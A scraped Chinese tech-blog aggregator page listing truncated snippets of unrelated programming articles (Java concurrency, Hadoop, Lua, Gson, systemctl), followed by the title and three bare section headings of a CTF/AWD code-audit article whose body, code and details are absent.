CyclicBarrier类一个同步辅助类，它允许一组线程互相等待，直到到达某个公共屏障点 (common barrier point)。在涉及一组固定大小的线程的程序中，这些线程必须不时地互相等待，此时 CyclicBarrier 很有用。因为该 barrier 在释放等待线程后可以重用，所以称它为循环的 barrier。 CyclicBarrier支持一个可选的 Runnable 命令，
九项重要的职业规划 bijian1013 工作学习
一. 学习的步伐不停止古人说，活到老，学到老。终身学习应该是您的座右铭。世界在不断变化，每个人都在寻找各自的事业途径。您只有保证了足够的技能储
【Java范型四】范型方法 bit1129 java
范型参数不仅仅可以用于类型的声明上，例如 package com.tom.lang.generics; import java.util.List; public class Generics<T> { private T value; public Generics(T value) { this.value =
【Hadoop十三】HDFS Java API基本操作 bit1129 hadoop
package com.examples.hadoop; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FSDataInputStream; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoo
ua实现split字符串分隔 ronin47 lua split
LUA并不象其它许多"大而全"的语言那样，包括很多功能，比如网络通讯、图形界面等。但是LUA可以很容易地被扩展：由宿主语言(通常是C或 C++)提供这些功能，LUA可以使用它们，就像是本来就内置的功能一样。LUA只包括一个精简的核心和最基本的库。这使得LUA体积小、启动速度快，从而适合嵌入在别的程序里。因此在lua中并没有其他语言那样多的系统函数。习惯了其他语言的字符串分割函
java-从先序遍历和中序遍历重建二叉树 bylijinnan java
public class BuildTreePreOrderInOrder { /** * Build Binary Tree from PreOrder and InOrder * _______7______ / \ __10__ ___2 / \ / 4
openfire开发指南《连接和登陆》开窍的石头 openfire 开发指南 smack
第一步官网下载smack.jar包下载地址：http://www.igniterealtime.org/downloads/index.jsp#smack 第二步把smack里边的jar导入你新建的java项目中开始编写smack连接openfire代码 p
[移动通讯]手机后盖应该按需要能够随时开启 comsci 移动
看到新的手机，很多由金属材质做的外壳，内存和闪存容量越来越大，CPU速度越来越快，对于这些改进，我们非常高兴，也非常欢迎但是，对于手机的新设计，有几点我们也要注意第一：手机的后盖应该能够被用户自行取下来，手机的电池的可更换性应该是必须保留的设计,
20款国外知名的php开源cms系统 cuiyadll cms
内容管理系统，简称CMS，是一种简易的发布和管理新闻的程序。用户可以在后端管理系统中发布，编辑和删除文章，即使您不需要懂得HTML和其他脚本语言，这就是CMS的优点。在这里我决定介绍20款目前国外市面上最流行的开源的PHP内容管理系统，以便没有PHP知识的读者也可以通过国外内容管理系统建立自己的网站。 1. Wordpress WordPress的是一个功能强大且易于使用的内容管
Java生成全局唯一标识符 darrenzhu java uuid unique identifier id
How to generate a globally unique identifier in Java http://stackoverflow.com/questions/21536572/generate-unique-id-in-java-to-label-groups-of-related-entries-in-a-log http://stackoverflow
php安装模块检测是否已安装过, 使用的SQL语句 dcj3sjt126com sql
SHOW [FULL] TABLES [FROM db_name] [LIKE 'pattern'] SHOW TABLES列举了给定数据库中的非TEMPORARY表。您也可以使用mysqlshow db_name命令得到此清单。本命令也列举数据库中的其它视图。支持FULL修改符，这样SHOW FULL TABLES就可以显示第二个输出列。对于一个表，第二列的值为BASE T
5天学会一种 web 开发框架 dcj3sjt126com Web 框架 framework
web framework层出不穷，特别是ruby/python,各有10+个,php/java也是一大堆根据我自己的经验写了一个to do list,按照这个清单，一条一条的学习，事半功倍，很快就能掌握一共25条，即便很磨蹭，2小时也能搞定一条，25*2=50。只需要50小时就能掌握任意一种web框架各类web框架大同小异:现代web开发框架的6大元素，把握主线，就不会迷路建议把本文
Gson使用三(Map集合的处理,一对多处理) eksliang json gson Gson map Gson 集合处理
转载请出自出处：http://eksliang.iteye.com/blog/2175532 一、概述 Map保存的是键值对的形式，Json的格式也是键值对的，所以正常情况下，map跟json之间的转换应当是理所当然的事情。二、Map参考实例 package com.ickes.json; import java.lang.refl
cordova实现“再点击一次退出”效果 gundumw100 android
基本的写法如下： document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { //navigator.splashscreen.hide(); document.addEventListener("b
openldap configuration leaning note iwindyforest configuration
hostname // to display the computer name hostname <changed name> // to change go to: /etc/sysconfig/network, add/modify HOSTNAME=NEWNAME to change permenately dont forget to change /etc/hosts
Nullability and Objective-C 啸笑天 Objective-C
https://developer.apple.com/swift/blog/?id=25 http://www.cocoachina.com/ios/20150601/11989.html http://blog.csdn.net/zhangao0086/article/details/44409913 http://blog.sunnyxx
jsp中实现参数隐藏的两种方法 macroli JavaScript jsp
在一个JSP页面有一个链接，//确定是一个链接?点击弹出一个页面，需要传给这个页面一些参数。//正常的方法是设置弹出页面的src="***.do?p1=aaa&p2=bbb&p3=ccc"//确定目标URL是Action来处理?但是这样会在页面上看到传过来的参数，可能会不安全。要求实现src="***.do"，参数通过其他方法传！//////
Bootstrap A标签关闭modal并打开新的链接解决方案 qiaolevip 每天进步一点点学习永无止境 bootstrap 纵观千象
Bootstrap里面的js modal控件使用起来很方便，关闭也很简单。只需添加标签 data-dismiss="modal" 即可。可是偏偏有时候需要a标签既要关闭modal，有要打开新的链接，尝试多种方法未果。只好使用原始js来控制。 <a href="#/group-buy" class="btn bt
二维数组在Java和C中的区别流淚的芥末 java c 二维数组数组
Java代码： public class test03 { public static void main(String[] args) { int[][] a = {{1},{2,3},{4,5,6}}; System.out.println(a[0][1]); } } 运行结果： Exception in thread "mai
systemctl命令用法 wmlJava linux systemctl
对比表，以 apache / httpd 为例任务旧指令新指令使某服务自动启动 chkconfig --level 3 httpd on systemctl enable httpd.service 使某服务不自动启动 chkconfig --level 3 httpd off systemctl disable httpd.service 检查服务状态 service h

代码审计-四叶草杯线下awd比赛源码web2

0x01 预留后门

0x02 后台任意文件上传getshell

分析:

0x03 前台getshell

你可能感兴趣的:(代码审计-四叶草杯线下awd比赛源码web2)